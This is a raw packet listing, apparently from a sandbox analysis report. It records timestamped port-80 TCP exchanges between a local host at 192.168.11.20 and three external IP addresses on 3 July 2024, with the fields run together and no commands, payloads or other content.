                                                            Jul 3, 2024 17:37:36.871701002 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.893623114 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.893857956 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.989762068 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.989980936 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.990000963 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990051985 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990222931 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990237951 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990248919 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.990350962 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990365028 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990416050 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.990490913 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990505934 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990516901 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990572929 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990586996 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.990694046 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990709066 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990874052 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.990972042 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.991051912 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.991063118 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.991075039 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.991318941 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.991329908 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.108774900 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.108836889 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.108903885 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.108944893 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109281063 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109414101 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109466076 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109496117 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109535933 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109575987 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109615088 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:37.109656096 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:38.257457972 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:38.376024008 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.286897898 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.405802011 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.406104088 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.419517040 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.538261890 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.561814070 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.561825037 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.562072992 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.567523956 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:39.567791939 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.568770885 CEST4979080192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:39.687194109 CEST80497903.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:44.848781109 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:44.967411995 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:44.967587948 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:44.983409882 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.102148056 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422059059 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422154903 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422231913 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422338963 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422344923 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.422426939 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422496080 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422525883 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.422569036 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422631025 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422699928 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422717094 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.422748089 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.422818899 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.422897100 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.460165977 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460216045 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460244894 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460306883 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460333109 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460410118 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.460448027 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:45.460566998 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460629940 CEST804979166.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:45.460753918 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:46.490024090 CEST4979180192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:47.522464991 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:47.641352892 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:47.641510963 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:47.657325983 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:47.776067019 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003277063 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003293037 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003329039 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003417015 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.003422976 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003436089 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003448009 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003459930 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003472090 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003484011 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003494024 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003593922 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.003593922 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.003593922 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.003742933 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.003906012 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.003923893 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.004009008 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.004064083 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.005001068 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005110979 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005124092 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005134106 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005275011 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.005335093 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005496979 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:48.005795956 CEST804979266.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:48.005939960 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:49.161552906 CEST4979280192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.190783024 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.309468031 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.309652090 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.326550961 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.326569080 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.326649904 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.445158005 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445249081 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445368052 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445377111 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445382118 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.445481062 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445491076 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.445550919 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.445692062 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.445894003 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.564058065 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564199924 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564210892 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.564333916 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564368010 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.564428091 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564477921 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564570904 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564570904 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.564582109 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564712048 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.564742088 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:50.564805984 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.682888985 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.683000088 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.683160067 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.683268070 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.683469057 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:50.683593035 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024049044 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024066925 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024094105 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024142981 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024156094 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024169922 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024194956 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024208069 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024219990 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024229050 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.024286985 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.024437904 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.024439096 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.060229063 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060276031 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060300112 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060328007 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060339928 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060506105 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.060589075 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060679913 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.060751915 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.061351061 CEST804979366.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:51.061527967 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:51.832595110 CEST4979380192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:52.862098932 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:52.980761051 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:52.980937004 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:52.995919943 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.114517927 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376271963 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376287937 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376390934 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376418114 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376431942 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376444101 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376461029 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.376463890 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376476049 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376487970 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376499891 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.376701117 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.376701117 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.377091885 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377105951 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377196074 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377207994 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377317905 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377325058 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.377372026 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.377882004 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377895117 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.377995968 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378046989 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.378129005 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378146887 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378160954 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.378343105 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.378784895 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378801107 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378895044 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378907919 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378920078 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.378990889 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.379040956 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.379594088 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.379607916 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.379707098 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.379720926 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.379739046 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.379769087 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.379920959 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.380390882 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.380470991 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.380676031 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.387466908 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387480021 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387541056 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387590885 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387604952 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387676001 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.387725115 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.387839079 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387852907 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387948990 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.387984991 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388004065 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388016939 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388113976 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388143063 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388780117 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388793945 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388875961 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388889074 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.388978004 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.388998985 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389098883 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389525890 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389571905 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389635086 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389705896 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389811993 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389825106 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.389842987 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.389990091 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.390393972 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390475035 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390553951 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390567064 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390578985 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.390638113 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.390769958 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.391253948 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.391268015 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:53.391407013 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.391407013 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.399492979 CEST4979480192.168.11.2066.235.200.145
                                                            Jul 3, 2024 17:37:53.518069983 CEST804979466.235.200.145192.168.11.20
                                                            Jul 3, 2024 17:37:58.598694086 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:58.951638937 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:58.951872110 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:58.967653990 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.320305109 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900204897 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900304079 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900315046 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900326967 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.900486946 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.908879042 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.908893108 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.909184933 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.950911999 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.951092958 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.969660044 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.969681025 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.969846964 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:37:59.969871044 CEST8049795103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:37:59.970005035 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:00.471358061 CEST4979580192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.502748966 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.864537001 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:01.864685059 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:01.880491972 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:02.247412920 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954888105 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954901934 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954911947 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.954924107 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.955087900 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:02.960083961 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.960196018 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:02.960278988 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.000777960 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.007447958 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022207022 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022217989 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022368908 CEST8049796103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:03.022427082 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.022521973 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:03.392554045 CEST4979680192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.422039986 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.772778988 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:04.772948980 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789894104 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789916992 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:04.789993048 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.140671015 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.140852928 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.141164064 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.141386032 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.141565084 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491250038 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491457939 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491476059 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491643906 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491799116 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.491813898 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491983891 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.491988897 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.492093086 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.492146969 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.492326021 CEST4979780192.168.11.20103.120.176.124
                                                            Jul 3, 2024 17:38:05.842888117 CEST8049797103.120.176.124192.168.11.20
                                                            Jul 3, 2024 17:38:05.842979908 CEST8049797103.120.176.124192.168.11.20
